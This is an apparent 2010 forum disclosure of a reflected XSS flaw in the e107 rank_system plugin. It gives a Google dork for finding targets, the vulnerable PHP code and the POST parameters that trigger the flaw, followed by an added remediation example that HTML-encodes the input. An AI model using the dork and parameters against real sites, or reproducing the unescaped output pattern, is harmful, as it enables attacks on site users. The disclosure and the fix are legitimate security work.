
06.05.2010, 01:45
Google: inurl:e107_plugins/rank_system/recommend.php
target: http://[host]/[path]/e107_plugins/rank_system/recommend.php
passive XSS
/e107_plugins/rank_system/recommend.php
PHP code:
    ...$recomm = new recommend();
    if (isset($_POST['nextstep'])) {
        $recomm_action = $_POST['recomm_action'];
    } else {
        $recomm_action = "";
    }...
PHP code:
    ....else if ($recomm_action == 'submit') {
        $type = intval($_POST['recomm_type']);
        $target = intval($_POST['recomm_target']);
        // raw POST value, no filtering
        $t_name = $_POST['t_name'];
        $r_for = intval($_POST['recomm_for']);
        $r_remarks = $tp->toDB($_POST['recomm_remarks']);
        if ($recomm->submitRecomm($target, $type, $r_for, $r_remarks)) {
            $msg = RANKS_RM_11;
        } else {
            $msg = RANKS_RM_12;
        }
        // $t_name is concatenated into the HTML below as-is
        $rank_text .= '
        <table class="rsborder" style="' . USER_WIDTH . '">
        <tr>
        <td class="rscaption" style="text-align:left">' . RANKS_RM_01 . ' [' . $t_name .']</td>...
Result (send via POST!):
nextstep = any value
recomm_action=submit
t_name= xss
P.S. It only works for an authorized user!
Last edited by Strilo4ka; 06.05.2010 at 01:55.
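
Added example, not part of the original post and not the plugin's own code: the caption output from the excerpt above with t_name HTML-encoded at the point of output. render_caption() is a hypothetical helper, and RANKS_RM_01 and USER_WIDTH are defined here with placeholder values.

```php
<?php
// Placeholder values for constants the plugin defines elsewhere (assumption).
define('RANKS_RM_01', 'Recommendation for');
define('USER_WIDTH', 'width:95%');

/**
 * Build the caption row as recommend.php does, but encode the
 * user-supplied name before it is concatenated into the markup.
 */
function render_caption(array $post): string
{
    // Same gate as the original code: only act on a submitted form.
    $action = isset($post['nextstep']) ? ($post['recomm_action'] ?? '') : '';
    if ($action !== 'submit') {
        return '';
    }

    // Reject non-string input such as t_name[]=... before encoding.
    $raw = $post['t_name'] ?? '';
    if (!is_string($raw)) {
        $raw = '';
    }

    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces
    // invalid UTF-8 instead of returning an empty string.
    $t_name = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<table class="rsborder" style="' . USER_WIDTH . '">'
         . '<tr><td class="rscaption" style="text-align:left">'
         . RANKS_RM_01 . ' [' . $t_name . ']</td></tr></table>';
}

// Constructed sample request: markup in t_name must come out as inert text.
$sample = [
    'nextstep'      => '1',
    'recomm_action' => 'submit',
    't_name'        => '"><b>not a name</b>',
];

$html = render_caption($sample);
echo $html, PHP_EOL;

// Fail loudly if the raw tag survived into the output.
if (strpos($html, '<b>') !== false) {
    throw new RuntimeException('t_name was not encoded');
}
```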